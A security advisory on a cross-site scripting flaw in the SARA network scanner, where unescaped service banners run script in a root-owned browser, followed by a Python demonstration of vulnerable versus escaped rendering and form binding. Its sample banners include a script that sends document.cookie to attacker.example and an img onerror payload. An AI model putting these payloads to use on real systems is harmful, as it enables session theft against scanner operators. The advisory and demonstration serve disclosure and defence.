XSS Vulnerability in Security Auditor's Research Assistant (SARA) versions before 5.0.0

Affects: SARA versions 4.2.6 and 4.2.7. Older versions not tested, presumably affected.

Related software (sharing common ancestry): SATAN 1.1.1 would not run properly on my test platform, but checking the code it did not look like it was affected. SAINT does not appear to be affected. Because of licensing constraints, I was only able to test a rather old version (3.1.2), but Saint Corporation was contacted and indicated that version 5.1.2 is not affected, and stated that earlier versions should also be unaffected.

Description: SARA, a descendant of SATAN, is a tool for probing networks for vulnerabilities (ideally so that they can be fixed). It creates its own mini-HTTP server so that the user can interact with the main process through a standard web browser. When scanning in interactive mode, information about target hosts and the services running on them is displayed, and in some cases this includes banners returned by the service. In SARA version 4.2.7 and before, these service banners were not properly sanitized, so HTML content in a banner is rendered, and any script in it executed, by the administrative web browser. A hostile host on the scanned network can therefore mount standard cross-site scripting attacks against the scanner operator, which may be seriously exacerbated by two facts:

i) The normal mode of operation is for the web browser to be started by sara, and as sara must be run as root for scanning operations, the web browser is typically a root-owned process.

ii) The simplified HTTP server automatically assigns the values of HTML form variables to global variables of the same name in the Perl script, so a crafted request can set arbitrary variables in the script.

Solution: Advanced Research Corporation was contacted about the issue on 20 Nov, and has included code in version 5.0.0 of the package to deal with the problem. Upgrading is recommended (see http://www-arc.com/sara/ for download information). I would also recommend against performing scans in interactive mode in any of these packages. Instead, I recommend that scans be run from the command line (or a script), thereby avoiding the invocation of the interactive HTTP interface as root. Data analysis does not require root privileges, and it would be safer to use the interactive interface only from a less privileged account (though access to the results files is still required).

Tom Payerle                     payerle@physics.umd.edu
Dept of Physics                 (301) 405-6973
University of Maryland          Fax: (301) 314-9525
College Park, MD 20742-4111
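The two mechanisms described in the Description section above, as an added illustration that is not SARA's own code: a scanner result page that interpolates service banners into HTML verbatim (the pre-5.0.0 behaviour) beside one that escapes them, and the form-variable-to-global binding of point (ii) beside an allow-listed replacement. All host addresses, banners, configuration keys and form fields below are constructed for the example.

```python
"""Illustrative code, not from SARA: unsanitized banner rendering vs. escaped
rendering, and unrestricted vs. allow-listed binding of form variables."""
import html
import re
from typing import Dict, List, Set

# Constructed banners as a scanner might collect them.  10.0.0.9 and
# 10.0.0.12 are hostile hosts that answer with HTML instead of a banner.
SAMPLE_BANNERS: Dict[str, str] = {
    "10.0.0.5:22": "SSH-2.0-OpenSSH_8.9",
    "10.0.0.9:25": '220 mail ESMTP <script>new Image().src='
                   '"http://attacker.example/?c="+document.cookie</script>',
    "10.0.0.12:80": 'Server: Apache <img src=x onerror="alert(1)">',
}


def render_table(banners: Dict[str, str], escape: bool) -> str:
    """Render one HTML row per probed port.

    escape=False reproduces the vulnerable pattern: banner text is placed
    straight into the page, so a hostile host's markup runs in the
    operator's browser.  escape=True converts <, >, &, " and ' to entities
    first, so the banner is displayed as text.
    """
    rows: List[str] = []
    for host, banner in banners.items():
        cell = html.escape(banner, quote=True) if escape else banner
        rows.append(f"<tr><td>{html.escape(host)}</td><td>{cell}</td></tr>")
    return "<table>\n" + "\n".join(rows) + "\n</table>"


_TAG_RE = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)")
_SCAFFOLD = {"table", "tr", "td"}


def foreign_tags(fragment: str) -> Set[str]:
    """Opening tag names in the fragment other than the table scaffolding
    we emit ourselves.  A non-empty result means banner content reached
    the browser as live markup."""
    return {m.group(1).lower() for m in _TAG_RE.finditer(fragment)} - _SCAFFOLD


# Point (ii): form variables mapped onto same-named program globals.
# Constructed config and field names; the keys are assumptions.
DEFAULT_CONFIG: Dict[str, str] = {
    "results_dir": "/var/lib/scanner/results",
    "probe_level": "light",
}
KNOWN_FORM_FIELDS = {"probe_level", "target"}


def bind_form_unrestricted(config: Dict[str, str], form: Dict[str, str]) -> Dict[str, str]:
    """Every submitted field overwrites the config key of the same name,
    so a forged request can redirect results_dir or anything else."""
    merged = dict(config)
    merged.update(form)
    return merged


def bind_form_allowlisted(config: Dict[str, str], form: Dict[str, str]) -> Dict[str, str]:
    """Only fields the page actually defines are copied; every other
    submitted name is dropped instead of becoming program state."""
    merged = dict(config)
    for name in KNOWN_FORM_FIELDS:
        if name in form:
            merged[name] = form[name]
    return merged


if __name__ == "__main__":
    for escape in (False, True):
        page = render_table(SAMPLE_BANNERS, escape=escape)
        print(f"escape={escape}: live tags from banners = {sorted(foreign_tags(page))}")
    forged = {"probe_level": "heavy", "results_dir": "/tmp/attacker"}
    print("unrestricted:", bind_form_unrestricted(DEFAULT_CONFIG, forged))
    print("allow-listed:", bind_form_allowlisted(DEFAULT_CONFIG, forged))
```

Run stand-alone, the script reports script and img as live tags for the unescaped page and none for the escaped one, and shows that only the allow-listed binding keeps results_dir at its configured value.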